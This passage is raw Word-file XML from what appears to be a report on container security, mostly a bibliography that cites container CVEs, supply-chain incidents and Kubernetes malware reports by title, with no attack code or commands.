        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2116901980">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2127699433">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="213840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payment-service:8080/charge" TargetMode="External"/><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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="head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Kno19</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{09BE4C48-5A78-4B2D-A7AC-4A50E59AFF92}</b:Guid>
    <b:Title>medium.com</b:Title>
    <b:Year>2019</b:Year>
    <b:LCID>en-US</b:LCID>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Inc</b:Last>
            <b:First>Knoldus</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Month>Mar</b:Month>
    <b:Day>13</b:Day>
    <b:URL>https://medium.com/@knoldus/unionfs-a-file-system-of-a-container-2136cd11a779</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sri18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{B77BA84D-AA05-4583-91B9-7ADC8065F928}</b:Guid>
    <b:Title>Linux Namespaces and cgroups as OS Primitives for Lightweight </b:Title>
    <b:Year>2018</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nimmagadda</b:Last>
            <b:First>Srikanth</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>researchgate</b:JournalName>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ros</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{7A834CBB-979D-4335-B2CF-03F0D4F5AB29}</b:Guid>
    <b:Title>Namespaces and Cgroups – the basis of Linux Containers</b:Title>
    <b:URL>https://www.andrew.cmu.edu/course/14-712-s20/applications/ln/Namespaces_Cgroups_Conatiners.pdf</b:URL>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Rosen</b:Last>
            <b:First>Rami</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mot23</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{065067B7-DC47-470F-856D-7DBC2C944C8E}</b:Guid>
    <b:Title>Exploring the Threat of Software Supply Chain Attacks on Containerized Applications</b:Title>
    <b:Year>2023</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Motahare Mounesan</b:Last>
            <b:First>Hossein</b:First>
            <b:Middle>Siadati, Sima Jafarikhah</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>researchgate</b:JournalName>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Cod21</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{71293DAD-B73E-482A-BFF0-93CCF190B50B}</b:Guid>
    <b:Title>Bash Uploader Security Incident</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Report</b:Last>
            <b:First>Codecov</b:First>
            <b:Middle>Official</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Publisher>Codecov Security Update</b:Publisher>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Cyb20</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{2A240200-C046-4CB3-83BB-9284D98E0A74}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>(CISA)</b:Last>
            <b:First>Cybersecurity</b:First>
            <b:Middle>and Infrastructure Security Agency</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>APT Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations (SolarWinds)</b:Title>
    <b:Year>2020</b:Year>
    <b:Publisher>CISA</b:Publisher>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nat19</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{FDEAD09D-9E6D-4D53-8C76-5E40D3C2CA84}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>(NVD)</b:Last>
            <b:First>National</b:First>
            <b:Middle>Vulnerability Database</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>CVE-2019-5736: runc Container Escape Vulnerability</b:Title>
    <b:Year>2019</b:Year>
    <b:Publisher>NIST</b:Publisher>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nat20</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{3D2CB8B1-27DD-4BA2-8596-FDB349298A70}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>(NVD)</b:Last>
            <b:First>National</b:First>
            <b:Middle>Vulnerability Database</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>CVE-2020-15257: containerd-shim API Exposure Vulnerability</b:Title>
    <b:Year>2020</b:Year>
    <b:Publisher>NIST</b:Publisher>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Max22</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{D3461180-4F2F-4A7D-ACFD-93F6931AE1CE}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Kellermann</b:Last>
            <b:First>Max</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The Dirty Pipe Vulnerability (CVE-2022-0847)</b:Title>
    <b:Year>2022</b:Year>
    <b:Publisher>CM4all Report</b:Publisher>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nat18</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{B7DB8683-CFD0-4582-A223-C22129682232}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>(NVD)</b:Last>
            <b:First>National</b:First>
            <b:Middle>Vulnerability Database</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>CVE-2018-1002105: Kubernetes API Server Privilege Escalation</b:Title>
    <b:Year>2018</b:Year>
    <b:Publisher>NIST</b:Publisher>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Pal21</b:Tag>
    <b:SourceType>BookSection</b:SourceType>
    <b:Guid>{0A508AC1-1242-4F3E-AFE4-0A80B58E44FF}</b:Guid>
    <b:Title>Unit 42</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Research</b:Last>
            <b:First>Palo</b:First>
            <b:Middle>Alto Networks</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:BookTitle>Hildegard: New Malware Campaign Targetting Kubernetes via Kubelet API</b:BookTitle>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nat21</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{CAF17B51-4338-4D70-AFDE-FE29C39D3670}</b:Guid>
    <b:Title>CVE-2021-25741: Kubernetes Ingress Controller Information Disclosure Vulnerability</b:Title>
    <b:Year>2021</b:Year>
    <b:Publisher>NIST</b:Publisher>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>(NVD)</b:Last>
            <b:First>National</b:First>
            <b:Middle>Vulnerability Database</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NVD20</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{EA2399BA-EB38-4079-BF68-F3F1A36F2AA0}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>NVD</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>CVE-2020-8554: Kubernetes MitM Vulnerability</b:Title>
    <b:Year>2020</b:Year>
    <b:Publisher>NIST</b:Publisher>
    <b:RefOrder>18</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DPr21</b:Tag>
    <b:SourceType>BookSection</b:SourceType>
    <b:Guid>{D320CBEF-80D6-412D-BA07-4FF4DF81EC50}</b:Guid>
    <b:Title>Siloscape: Malware Targeting Kubernetes</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Prizmant</b:Last>
            <b:First>D.</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:BookTitle>Siloscape: Malware Targeting Kubernetes</b:BookTitle>
    <b:RefOrder>17</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Eri24</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{D02F49CB-FAE9-4A18-890C-0B7906D52EFE}</b:Guid>
    <b:Title>Aqua Blog</b:Title>
    <b:Year>2024</b:Year>
    <b:ProductionCompany>Aqua Inc</b:ProductionCompany>
    <b:Month>June</b:Month>
    <b:Day>17</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>June</b:MonthAccessed>
    <b:DayAccessed>17</b:DayAccessed>
    <b:URL>https://www.aquasec.com/blog/understanding-the-importance-of-runtime-security-in-cloud-native-environments/</b:URL>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Stephan</b:Last>
            <b:First>Erin</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ste22</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{1091148C-FA6A-4E60-A2B9-E495039A41E6}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Roger</b:Last>
            <b:First>Steve</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>dhl freight connections</b:Title>
    <b:ProductionCompany>DLH</b:ProductionCompany>
    <b:Year>2022</b:Year>
    <b:Month>July</b:Month>
    <b:Day>14</b:Day>
    <b:URL>https://dhl-freight-connections.com/en/logistics-dictionary/container/</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mik24</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{115B611F-2E71-42F1-AF69-C618933FE0BD}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Miller</b:Last>
            <b:First>Mike</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Use containers to Build, Share and Run your applications</b:Title>
    <b:ProductionCompany>Docker Inc</b:ProductionCompany>
    <b:Year>2024</b:Year>
    <b:Month>May</b:Month>
    <b:Day>15</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>May</b:MonthAccessed>
    <b:DayAccessed>15</b:DayAccessed>
    <b:URL>https://www.docker.com/resources/what-container/</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>The25</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{53945EF0-E847-494D-A089-6C7E3974F5A1}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Experts</b:Last>
            <b:First>The</b:First>
            <b:Middle>Cloud Native</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>A Brief History of Containers: From the 1970s Till Now</b:Title>
    <b:ProductionCompany>Aqua Inc</b:ProductionCompany>
    <b:Year>2025</b:Year>
    <b:Month>September</b:Month>
    <b:Day>10</b:Day>
    <b:URL>https://www.aquasec.com/blog/a-brief-history-of-containers-from-1970s-chroot-to-docker-2016/</b:URL>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sha22</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{778E1EF4-A9D7-4898-9DB1-8B141F187928}</b:Guid>
    <b:Title>Extended Berkeley Packet Filter: An Application Perspective</b:Title>
    <b:JournalName>IEEE Access</b:JournalName>
    <b:Year>2022</b:Year>
    <b:Pages>35</b:Pages>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sharaf</b:Last>
            <b:First>Husain </b:First>
          </b:Person>
          <b:Person>
            <b:Last>Ahmad</b:Last>
            <b:First>Imtiaz </b:First>
          </b:Person>
          <b:Person>
            <b:Last>Dimitriou</b:Last>
            <b:First>Tassos </b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>19</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B5E48AB1-87CF-45E1-ACD9-678B98B5F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12833</Words>
  <Characters>73154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Nguyen Tuan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Erik Horus</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <cp:lastPrinted>2026-07-27T08:39:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-26T16:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-27T08:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>